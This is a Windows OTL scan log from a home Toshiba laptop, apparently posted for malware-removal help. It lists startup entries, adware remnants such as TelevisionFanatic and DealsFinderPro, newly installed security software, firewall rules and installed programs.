O4 - HKLM..\Run: [NortonOnlineBackupReminder] C:\Program Files\TOSHIBA\Toshiba Online Backup\Activation\TobuActivation.exe (Toshiba)
O4 - HKLM..\Run: [SmoothView] C:\Program Files\TOSHIBA\SmoothView\SmoothView.exe (TOSHIBA Corporation)
O4 - HKLM..\Run: [StartCCC] C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe (Advanced Micro Devices, Inc.)
O4 - HKLM..\Run: [SVPWUTIL] C:\Program Files\TOSHIBA\Utilities\SVPWUTIL.exe (TOSHIBA CORPORATION)
O4 - HKLM..\Run: [TelevisionFanatic Browser Plugin Loader] C:\Program Files\TelevisionFanatic\bar\1.bin\64brmon.exe ()
O4 - HKLM..\Run: [TelevisionFanatic Search Scope Monitor] C:\Program Files\TelevisionFanatic\bar\1.bin\64SrchMn.exe ()
O4 - HKLM..\Run: [ToshibaServiceStation] C:\Program Files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe (TOSHIBA Corporation)
O4 - HKLM..\Run: [TosSENotify] C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe (TOSHIBA Corporation)
O4 - HKLM..\Run: [TPwrMain] C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe (TOSHIBA Corporation)
O4 - HKCU..\Run: [MyTOSHIBA] C:\Program Files\TOSHIBA\My Toshiba\MyToshiba.exe (TOSHIBA)
O4 - Startup: C:\Users\Mom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk = C:\Program Files\Microsoft Office\Office14\ONENOTEM.EXE (Microsoft Corporation)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O8 - Extra context menu item: Add to Anti-Banner - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\ie_banner_deny.htm ()
O8 - Extra context menu item: E&xport to Microsoft Excel - C:\Program Files\Microsoft Office\Office14\EXCEL.EXE (Microsoft Corporation)
O8 - Extra context menu item: Se&nd to OneNote - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra Button: Virtual Keyboard - {0C4CC089-D306-440D-9772-464E226F6539} - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll (Kaspersky Lab ZAO)
O9 - Extra Button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra Button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra Button: URLs check - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\IEExt\UrlAdvisor\klwtbbho.dll (Kaspersky Lab ZAO)
O13 - gopher Prefix: missing
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_14)
O16 - DPF: {CAFEEFAC-0016-0000-0014-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_14)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_14)
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.ad...Plus/1.6/gp.cab (Reg Error: Key error.)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{A3724C8B-7757-40B3-A609-350AB764ABF0}: DhcpNameServer = 192.168.1.1
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\windows\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: VMApplet - (SystemPropertiesPerformance.exe) - C:\windows\System32\SystemPropertiesPerformance.exe (Microsoft Corporation)
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2009/06/10 13:42:20 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]
O33 - MountPoints2\{19d6c12e-2ff6-11e1-afee-88ae1d506189}\Shell - "" = AutoRun
O33 - MountPoints2\{19d6c12e-2ff6-11e1-afee-88ae1d506189}\Shell\AutoRun\command - "" = F:\LaunchU3.exe -a
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/11/09 21:22:58 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Mom\Desktop\OTL.exe
[2014/11/09 18:51:57 | 000,000,000 | ---D | C] -- C:\windows\System32\SPReview
[2014/11/09 16:52:48 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kaspersky Internet Security
[2014/11/09 16:50:40 | 000,000,000 | ---D | C] -- C:\windows\ELAMBKUP
[2014/11/09 16:50:24 | 000,000,000 | ---D | C] -- C:\ProgramData\Kaspersky Lab
[2014/11/09 16:50:24 | 000,000,000 | ---D | C] -- C:\Program Files\Kaspersky Lab
[2014/11/09 16:50:02 | 000,644,808 | ---- | C] (Kaspersky Lab ZAO) -- C:\windows\System32\drivers\klif.sys
[2014/11/09 16:50:02 | 000,112,136 | ---- | C] (Kaspersky Lab ZAO) -- C:\windows\System32\drivers\klflt.sys
[2014/11/09 16:50:01 | 000,034,400 | ---- | C] (Kaspersky Lab ZAO) -- C:\windows\System32\drivers\klhk.sys
[2014/11/09 07:57:40 | 000,114,904 | ---- | C] (Malwarebytes Corporation) -- C:\windows\System32\drivers\MBAMSwissArmy.sys
[2014/11/09 07:57:16 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
[2014/11/09 07:56:52 | 000,075,480 | ---- | C] (Malwarebytes Corporation) -- C:\windows\System32\drivers\mbamchameleon.sys
[2014/11/09 07:56:52 | 000,051,928 | ---- | C] (Malwarebytes Corporation) -- C:\windows\System32\drivers\mwac.sys
[2014/11/09 07:56:52 | 000,023,256 | ---- | C] (Malwarebytes Corporation) -- C:\windows\System32\drivers\mbam.sys
[2014/11/09 07:56:52 | 000,000,000 | ---D | C] -- C:\Program Files\Malwarebytes Anti-Malware
[2014/11/09 07:56:52 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2014/11/08 23:51:45 | 000,000,000 | ---D | C] -- C:\Users\Mom\AppData\Roaming\LavasoftStatistics
[2014/11/08 15:15:50 | 000,000,000 | ---D | C] -- C:\Program Files\Enigma Software Group
[2014/11/08 14:02:08 | 000,000,000 | ---D | C] -- C:\ProgramData\2308189059
[2014/11/08 13:58:48 | 000,000,000 | ---D | C] -- C:\Program Files\DealsFinderPro
[2014/11/08 08:02:20 | 000,000,000 | ---D | C] -- C:\ProgramData\SaveItCoupons
[2014/11/08 08:01:03 | 000,000,000 | ---D | C] -- C:\ProgramData\DealsFinderPro
[2014/11/08 07:07:31 | 000,000,000 | ---D | C] -- C:\ProgramData\7bb6df21-8ca8-4eec-965d-8cd2261544c7
[2014/11/08 07:04:00 | 000,000,000 | ---D | C] -- C:\ProgramData\5ace784aaccbed8e
[2014/11/07 20:14:44 | 000,000,000 | ---D | C] -- C:\Users\Mom\AppData\Local\Programs
[2014/11/07 18:57:32 | 000,000,000 | ---D | C] -- C:\Program Files\Mozilla Firefox
[1 C:\windows\*.tmp files -> C:\windows\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014/11/09 21:28:03 | 000,000,886 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/11/09 21:23:12 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Mom\Desktop\OTL.exe
[2014/11/09 21:16:01 | 000,000,830 | ---- | M] () -- C:\windows\tasks\Adobe Flash Player Updater.job
[2014/11/09 20:28:01 | 000,000,882 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/11/09 20:27:15 | 000,624,178 | ---- | M] () -- C:\windows\System32\perfh009.dat
[2014/11/09 20:27:15 | 000,106,522 | ---- | M] () -- C:\windows\System32\perfc009.dat
[2014/11/09 20:21:58 | 000,067,584 | --S- | M] () -- C:\windows\bootstat.dat
[2014/11/09 19:56:19 | 000,016,304 | -H-- | M] () -- C:\windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/11/09 19:56:19 | 000,016,304 | -H-- | M] () -- C:\windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/11/09 19:48:40 | 000,000,476 | ---- | M] () -- C:\windows\tasks\SDMsgUpdate (Local).job
[2014/11/09 19:48:38 | 000,000,468 | ---- | M] () -- C:\windows\tasks\SDMsgUpdate (TE).job
[2014/11/09 19:48:08 | 1408,045,056 | -HS- | M] () -- C:\hiberfil.sys
[2014/11/09 17:08:44 | 000,644,808 | ---- | M] (Kaspersky Lab ZAO) -- C:\windows\System32\drivers\klif.sys
[2014/11/09 17:08:44 | 000,112,136 | ---- | M] (Kaspersky Lab ZAO) -- C:\windows\System32\drivers\klflt.sys
[2014/11/09 16:52:27 | 000,001,129 | ---- | M] () -- C:\Users\Public\Desktop\Kaspersky Internet Security.lnk
[2014/11/09 11:28:49 | 000,114,904 | ---- | M] (Malwarebytes Corporation) -- C:\windows\System32\drivers\MBAMSwissArmy.sys
[2014/11/09 08:49:10 | 000,000,000 | RHS- | M] () -- C:\MSDOS.SYS
[2014/11/09 08:49:10 | 000,000,000 | RHS- | M] () -- C:\IO.SYS
[2014/11/08 07:56:03 | 000,082,656 | ---- | M] () -- C:\Users\Mom\Documents\cc_20141108_074954.reg
[2014/11/08 07:02:41 | 000,000,042 | ---- | M] () -- C:\Users\Mom\AppData\Roaming\WB.CFG
[2014/11/07 20:15:12 | 000,002,100 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2014/11/07 20:15:12 | 000,001,071 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2014/10/20 15:19:25 | 000,368,992 | ---- | M] () -- C:\windows\System32\FNTCACHE.DAT
[1 C:\windows\*.tmp files -> C:\windows\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014/11/09 16:52:48 | 000,001,129 | ---- | C] () -- C:\Users\Public\Desktop\Kaspersky Internet Security.lnk
[2014/11/09 08:49:10 | 000,000,000 | RHS- | C] () -- C:\MSDOS.SYS
[2014/11/09 08:49:10 | 000,000,000 | RHS- | C] () -- C:\IO.SYS
[2014/11/08 07:50:05 | 000,082,656 | ---- | C] () -- C:\Users\Mom\Documents\cc_20141108_074954.reg
[2014/11/08 07:02:41 | 000,000,042 | ---- | C] () -- C:\Users\Mom\AppData\Roaming\WB.CFG
 
========== ZeroAccess Check ==========
 
[2009/07/13 20:42:31 | 000,000,227 | RHS- | M] () -- C:\windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2012/06/08 20:46:56 | 012,868,608 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2009/07/13 17:15:20 | 000,605,696 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = %systemroot%\system32\wbem\wbemess.dll -- [2009/07/13 17:16:17 | 000,342,528 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
========== LOP Check ==========
 
[2014/09/08 19:07:33 | 000,000,000 | ---D | M] -- C:\Users\Mom\AppData\Roaming\EncryptStick
[2013/10/21 15:39:18 | 000,000,000 | ---D | M] -- C:\Users\Mom\AppData\Roaming\SmartDraw
[2011/07/26 20:17:27 | 000,000,000 | ---D | M] -- C:\Users\Mom\AppData\Roaming\Spotify
[2013/02/16 15:36:13 | 000,000,000 | ---D | M] -- C:\Users\Mom\AppData\Roaming\WildTangent
[2010/12/25 22:06:29 | 000,000,000 | ---D | M] -- C:\Users\Mom\AppData\Roaming\WinBatch
[2014/10/02 18:53:20 | 000,000,000 | ---D | M] -- C:\Users\Mom\AppData\Roaming\Windows Live Writer
 
========== Purity Check ==========
 
 
 
< End of report >
 
 
OTL Extras logfile created on: 11/9/2014 9:23:59 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Mom\Desktop
 Home Premium Edition  (Version = 6.1.7600) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
1.75 Gb Total Physical Memory | 0.76 Gb Available Physical Memory | 43.25% Memory free
3.50 Gb Paging File | 1.89 Gb Available in Paging File | 54.07% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\windows | %ProgramFiles% = C:\Program Files
Drive C: | 223.33 Gb Total Space | 165.42 Gb Free Space | 74.07% Space Free | Partition Type: NTFS
 
Computer Name: MOM-PC | User Name: Mom | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\windows\System32\control.exe (Microsoft Corporation)
.hlp [@ = hlpfile] -- C:\windows\winhlp32.exe (Microsoft Corporation)
 
[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] -- C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)
 
========== Shell Spawning ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
hlpfile [open] -- %SystemRoot%\winhlp32.exe %1 (Microsoft Corporation)
htmlfile [edit] -- "C:\Program Files\Microsoft Office\Office14\msohtmed.exe" %1 (Microsoft Corporation)
htmlfile [print] -- "C:\Program Files\Microsoft Office\Office14\msohtmed.exe" /p %1 (Microsoft Corporation)
http [open] -- "C:\Program Files\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
https [open] -- "C:\Program Files\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
 
========== Security Center Settings ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]
"DisableMonitoring" = 1
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = Reg Error: Unknown registry data type -- File not found
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
 
========== Firewall Settings ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
========== Authorized Applications List ==========
 
 
========== Vista Active Open Ports Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{034A10A3-D8AC-4DE2-AB4D-6CA4A21E268F}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=svchost.exe | 
"{0A9868CD-3593-4E9E-B6F4-5566F7A25CAF}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{14DFA8AD-50A0-4552-9550-021D71739AF6}" = lport=1900 | protocol=17 | dir=in | name=windows live communications platform (ssdp) | 
"{1D10302D-0352-4EC2-A4C8-114F27D4178C}" = lport=138 | protocol=17 | dir=in | app=system | 
"{2733B6CC-D5BF-4EEB-BF17-5D762DF2DC23}" = lport=2869 | protocol=6 | dir=in | name=windows live communications platform (upnp) | 
"{326CF71B-6DA4-4411-89D2-1EBDAE1DA23A}" = lport=137 | protocol=17 | dir=in | app=system | 
"{38C9414F-32BB-4363-9F63-8C6FF23B2CE1}" = lport=2869 | protocol=6 | dir=in | app=system | 
"{3909BE6B-4FBC-4172-9974-D78B822E3741}" = rport=10243 | protocol=6 | dir=out | app=system | 
"{408B2DFB-20F1-403F-BC12-E13B03FD8442}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{5BFCCBCD-5A4B-4F59-94AD-F68A79A7CE63}" = rport=138 | protocol=17 | dir=out | app=system | 
"{5C495CCC-09F5-442D-9FF5-C4471CB69558}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{72BC0C32-44D7-4B72-8E99-AF8887EAA15D}" = lport=2869 | protocol=6 | dir=in | app=system | 
"{7BC0C181-1451-4574-A862-02A9C2EF976D}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe | 
"{80FAF627-CE0D-4F92-B7AF-925DC037B23D}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{97F101A2-270B-47EB-B8CC-752BBF3EF929}" = lport=5353 | protocol=17 | dir=in | app=c:\program files\google\chrome\application\chrome.exe | 
"{AFA5488D-E71D-431B-BE87-7B0ABACE2F59}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe | 
"{B7A7BCA6-9E75-4740-ABCD-6E7861B53342}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe | 
"{BC1E2A8C-3841-4593-8508-B214CD0E68F8}" = lport=445 | protocol=6 | dir=in | app=system | 
"{C20B7C82-5F1B-4395-B364-B074D946D7B3}" = rport=139 | protocol=6 | dir=out | app=system | 
"{D1CB159D-1EC8-466A-B60B-7076786A88CA}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{D1EB7762-68C6-47FD-B6A8-F1547395510C}" = lport=139 | protocol=6 | dir=in | app=system | 
"{D26DAA5D-5696-43DD-AEE9-8C1D506613DE}" = lport=10243 | protocol=6 | dir=in | app=system | 
"{E47788A7-9683-4F1A-A203-09DF15ADFB85}" = rport=445 | protocol=6 | dir=out | app=system | 
"{E585B7E4-C8B7-4F16-A132-7D4CB8A59468}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | [email protected],-28539 | 
"{F7098A6D-F042-4E9F-8C04-59CBD3FA8F45}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{F7E77797-C865-4467-A979-298B6BFD271D}" = rport=137 | protocol=17 | dir=out | app=system | 
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0C6BB9C4-7C8F-4C26-A1FB-AFFE3F2EFFEE}" = protocol=1 | dir=out | [email protected],-28544 | 
"{0E0CB917-406C-4965-9904-E0C291C0D607}" = protocol=6 | dir=in | app=c:\program files\microsoft office\office14\onenote.exe | 
"{3113D2C9-CAD2-46F9-919D-0424B9E3A018}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{3B92A27F-450E-48D2-88D8-DB5686D85F45}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe | 
"{58F57997-A6F8-44E4-8AA6-25F70D6FD19F}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe | 
"{5B703F67-6A1A-4593-BFA5-063F86F3F0C2}" = protocol=17 | dir=in | app=c:\program files\microsoft office\office14\onenote.exe | 
"{6121B8E9-B659-4934-B6DF-C8F391F63EC3}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{9B0BF167-96D9-47B6-80E1-7D28BC54A551}" = protocol=58 | dir=in | [email protected],-28545 | 
"{A2DE50F3-1ED4-482F-A6BF-1165D1C084DB}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe | 
"{A48E9EB2-BF04-4B33-A95E-5F0C7674290E}" = protocol=58 | dir=out | [email protected],-28546 | 
"{A6CBDE2E-6712-4708-B5E4-1643B141A978}" = protocol=1 | dir=in | [email protected],-28543 | 
"{A6F37D48-DB0E-4D56-B41E-D963AA928F20}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{AB9F689A-8BF2-479A-B6C5-3E38757515DC}" = protocol=6 | dir=out | app=system | 
"{B52E0F04-E2BA-4721-91E5-4F630A42A320}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe | 
"{B5AEF1F4-6D35-425E-AC30-B4FC149BAA15}" = dir=in | app=c:\program files\windows live\sync\windowslivesync.exe | 
"{BB42E78D-DE82-409E-94B1-A46FA4899B89}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe | 
"{CC42871A-7CAE-4EFA-AC0A-10BDD7D26BC8}" = dir=in | app=c:\program files\windows live\contacts\wlcomm.exe | 
"{E38C5E3A-52C0-444B-8AB3-3A6FDB7D9562}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe | 
"{E6172108-C5E8-4891-884E-9658F6CFB8D0}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{FD3212C9-596F-4322-8467-356D5EAD8C54}" = protocol=6 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe | 
"{FECEADC3-AD49-426A-8024-5A4FA54F0111}" = dir=in | app=c:\program files\windows live\messenger\msnmsgr.exe | 
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{008D69EB-70FF-46AB-9C75-924620DF191A}" = TOSHIBA Speech System SR Engine(U.S.) Version1.0
"{01250B8F-D947-4F8A-9408-FE8E3EE2EC92}" = MyToshiba
"{0B0F231F-CE6A-483D-AA23-77B364F75917}" = Windows Live Installer
"{0D795777-9D60-4692-8386-F2B3F2B5E5BF}" = Label@Once 1.0
"{0DB8F853-899A-8628-E0D7-29FB190CF848}" = Catalyst Control Center Graphics Full Existing
"{0FB630AB-7BD8-40AE-B223-60397D57C3C9}" = Realtek WLAN Driver
"{107F27B7-8EE4-4B3A-9CE5-497B120369DC}" = Microsoft Security Client
"{117BCF94-6A1E-6741-39F5-09444381445E}" = CCC Help Italian
"{1211D6B0-B7B5-CB9A-99A2-066473FC35CA}" = CCC Help Swedish
"{12688FD7-CB92-4A5B-BEE4-5C8E0574434F}" = Utility Common Driver
"{12B3A009-A080-4619-9A2A-C6DB151D8D67}" = TOSHIBA Assist
"{14956199-1890-C3D4-F8B8-3C0C6FD82993}" = ccc-core-static
"{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}" = Microsoft Works
"{18455581-E099-4BA8-BC6B-F34B2F06600C}" = Google Toolbar for Internet Explorer
"{19BA08F7-C728-469C-8A35-BFBD3633BE08}" = Windows Live Movie Maker
"{1D210042-41EE-4472-2219-6A900366B9A3}" = CCC Help French
"{1F6AB0E7-8CDD-4B93-8A23-AA9EB2FEFCE4}" = Junk Mail filter update
"{200FEC62-3C34-4D60-9CE8-EC372E01C08F}" = Windows Live SOXE Definitions
"{2318C2B1-4965-11d4-9B18-009027A5CD4F}" = Google Toolbar for Internet Explorer
"{26A24AE4-039D-4CA4-87B4-2F83216014FF}" = Java™ 6 Update 14
"{2ABB6396-785C-E2CB-579E-79BAF98E0527}" = Catalyst Control Center Graphics Previews Vista
"{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App" = Update Installer for WildTangent Games App
"{3336F667-9049-4D46-98B6-4C743EEBC5B1}" = Windows Live Photo Gallery
"{34F4D9A4-42C2-4348-BEF4-E553C84549E7}" = Windows Live Photo Gallery
"{37476589-E48E-439E-A706-56189E2ED4C4}_is1" = SaveItCoupons
"{3B843B38-04B1-4CE6-8888-586273E0F289}" = Quickbooks Financial Center
"{3C3901C5-3455-3E0A-A214-0B093A5070A6}" = Microsoft .NET Framework 4 Client Profile
"{3E1B8E31-9692-207B-77B7-A8339AF03795}" = Catalyst Control Center Graphics Full New
"{3FBF6F99-8EC6-41B4-8527-0A32241B5496}" = TOSHIBA Speech System TTS Engine(U.S.) Version1.0
"{4CBABDFD-49F8-47FD-BE7D-ECDE7270525A}" = Windows Live PIMT Platform
"{51B4E156-14A5-4904-9AE4-B1AA2A0E46BE}" = TOSHIBA Supervisor Password
"{51C77E17-3337-6409-16A9-A90CA8B9BBF6}" = ccc-utility
"{5279374D-87FE-4879-9385-F17278EBB9D3}" = TOSHIBA Hardware Setup
"{58630658-9DF7-E873-9F5D-0EAF87D25DAA}" = CCC Help Norwegian
"{594A3C2C-19B3-E02E-359C-B8D134F6B939}" = CCC Help Korean
"{5AF550B4-BB67-4E7E-82F1-2C4300279050}" = ToshibaRegistration
"{5DA0E02F-970B-424B-BF41-513A5018E4C0}" = TOSHIBA Disc Creator
"{6055830B-40E4-C794-3F04-2D0CD8AF1AAC}" = CCC Help Russian
"{612C34C7-5E90-47D8-9B5C-0F717DD82726}" = swMSM
"{617C36FD-0CBE-4600-84B2-441CEB12FADF}" = TOSHIBA Extended Tiles for Windows Mobility Center
"{61AD15B2-50DB-4686-A739-14FE180D4429}" = Windows Live ID Sign-in Assistant
"{620BBA5E-F848-4D56-8BDA-584E44584C5E}" = TOSHIBA Flash Cards Support Utility
"{653C1B5A-3287-47B1-8613-0745D4E771C4}" = Kaspersky Internet Security
